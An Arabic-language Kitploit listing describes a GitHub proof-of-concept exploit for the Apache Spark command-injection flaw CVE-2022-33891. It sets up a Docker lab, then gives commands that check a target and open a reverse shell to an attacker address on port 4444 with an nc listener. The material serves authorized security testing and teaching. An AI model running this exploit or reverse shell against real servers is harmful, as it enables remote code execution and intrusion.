Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-33891 — استغلال إثبات مفهوم لحقن أوامر Apache Spark (CVE-2022-33891) مع أوضاع الفحص والشل العكسية، مما يتيح اختبار الأمان المصرح به. | Kitploit
أدوات/GitHubGitHub/asepsaepdin/cve-2022-33891
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

استغلال إثبات مفهوم لحقن أوامر Apache Spark (CVE-2022-33891) مع أوضاع الفحص والشل العكسية، مما يتيح اختبار الأمان المصرح به.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-33891 - ثغرة حقن الأوامر في Apache Spark

Python


⚠️ لأغراض تعليمية وبحوث أمنية مصرح بها فقط

مؤلفو الاستغلال الأصليون

شكر كبير لمؤلف PoC الأصلي AkbarTrilaksana

الوصف

توفر واجهة مستخدم Apache Spark إمكانية تفعيل قوائم التحكم بالوصول (ACLs) عبر خيار الإعداد spark.acls.enable. مع وجود مرشح مصادقة (authentication filter)، يتحقق هذا الخيار مما إذا كان المستخدم يملك أذونات وصول لعرض التطبيق أو تعديله. إذا تم تفعيل الـ ACLs، فإن مسارًا برمجيًا في HttpSecurityFilter يمكن أن يسمح لشخص ما بانتحال الشخصية عبر تقديم اسم مستخدم عشوائي. عندها قد يتمكن مستخدم خبيث من الوصول إلى دالة فحص الأذونات التي ستبني في النهاية أمرًا لصدفة Unix استنادًا إلى مدخلاته، ثم تنفيذه. يؤدي هذا إلى تنفيذ أوامر عشوائية في الصدفة بصلاحية المستخدم الذي تعمل به Spark حاليًا. تؤثر هذه الثغرة على إصدارات Apache Spark 3.0.3 والإصدارات الأقدم، والإصدارات من 3.1.1 إلى 3.1.2، والإصدارات من 3.2.0 إلى 3.2.1.


دليل الخطوات

  1. أولاً، استنسخ المستودع

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  2. انتقل إلى الدليل

    root@kitploit:~
    cd CVE-2022-33891
    
  3. ثبّت التبعيات:

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  4. اترك الحاوية تبدأ التشغيل

    root@kitploit:~
    docker compose up
    
  5. في طرفية جديدة، نفّذ الأمر

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  6. داخل جلسة bash الخاصة بالحاوية، أدخل:

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  7. اختياريًا، استخدم cat لعرض محتويات spark-defaults.conf للتأكد من أنها تبدو صحيحة.

  8. اخرج من جلسة bash التفاعلية ثم اضغط Ctl-C لإنهاء عملية docker-compose.

  9. بمجرد توقف الحاويات بشكل آمن، أعد تنفيذ docker-compose up

    root@kitploit:~
    docker compose up
    
  10. تحقق مما إذا كان الهدف عرضة للثغرة:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  11. من منظور المهاجم، يُعد تنفيذ الأوامر عن بُعد أمرًا بالغ الأهمية للوصول إلى صدفة تفاعلية. لذا، فإن تنفيذ الأمر التالي سيؤدي إلى تشغيل قشرة عكسية (reverse shell) عبر telnet و tcp مبنية على bash إلى نظام المهاجم على المنفذ 4444/tcp:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

الاعتمادات

  • https://github.com/AkbarTrilaksana/cve-2022-33891
  • https://nvd.nist.gov/vuln/detail/cve-2022-33891
تنزيل الأداة